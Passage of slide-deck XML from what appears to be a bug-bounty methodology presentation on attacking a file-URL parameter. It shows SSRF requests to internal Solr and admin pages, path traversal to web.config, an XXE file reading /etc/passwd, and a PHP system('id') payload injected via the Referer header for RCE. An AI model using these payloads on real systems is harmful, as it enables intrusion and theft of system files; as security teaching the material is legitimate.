                <a:srgbClr val="434343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811" name="Google Shape;811;p86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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2" name="Google Shape;812;p86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="813" name="Google Shape;813;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="814" name="Google Shape;814;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Blog</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="815" name="Google Shape;815;p8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7300" y="2675525"/>
            <a:ext cx="492200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="816" name="Google Shape;816;p86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://apache-solr.company.com/solr/gettingstarted/select?q={!xmlparser v='&lt;!DOCTYPE a SYSTEM "http://me.com/"'&gt;&lt;a&gt;&lt;/a&gt;'</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="820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87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If There Is ASP.NET </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.+./.+./web.config </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http:// 127.0.0.1:[0-65535]/[Home|Admin|Administrator]/Index?</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Admin Page</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="822" name="Google Shape;822;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http:// 127.0.0.1:PORT/Home/Index?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="823" name="Google Shape;823;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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824" name="Google Shape;824;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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5" name="Google Shape;825;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="826" name="Google Shape;826;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="827" name="Google Shape;827;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Blog</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="828" name="Google Shape;828;p8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4025" y="3067788"/>
            <a:ext cx="421000" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="829" name="Google Shape;829;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128400" cy="3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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="830" name="Google Shape;830;p8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3475" y="2675525"/>
            <a:ext cx="462101" cy="365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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="834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88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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836" name="Google Shape;836;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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7" name="Google Shape;837;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reading From Remote XML File</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="838" name="Google Shape;838;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839" name="Google Shape;839;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://me.com/file.xml</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="840" name="Google Shape;840;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205300" y="1581400"/>
            <a:ext cx="4835100" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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rgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat file.xml</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00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rgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?xml version="1.0"?&gt; </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00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rgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!DOCTYPE root [</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00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rgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!ENTITY read SYSTEM "file:///etc/passwd"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00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rgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7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rgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;root&gt;&lt;email&gt;&amp;read;&lt;/email&gt;&lt;/root&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="841" name="Google Shape;841;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="842" name="Google Shape;842;p8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9250" y="2675525"/>
            <a:ext cx="490550" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="843" name="Google Shape;843;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="844" name="Google Shape;844;p8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22925" y="3110050"/>
            <a:ext cx="503200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="845" name="Google Shape;845;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3460050"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="846" name="Google Shape;846;p8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64025" y="3537325"/>
            <a:ext cx="421000" cy="34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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ../../</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../proc/self/fd/Number-FUZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With Referer Header</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?php system('id');?&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get RCE </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;254;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?php system('id');?&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../../../proc/self/fd/Number-FUZZ</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Google Shape;255;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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56" name="Google Shape;256;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="258" name="Google Shape;258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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181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44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="260" name="Google Shape;260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8350" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="850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89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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852" name="Google Shape;852;p89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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3" name="Google Shape;853;p89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
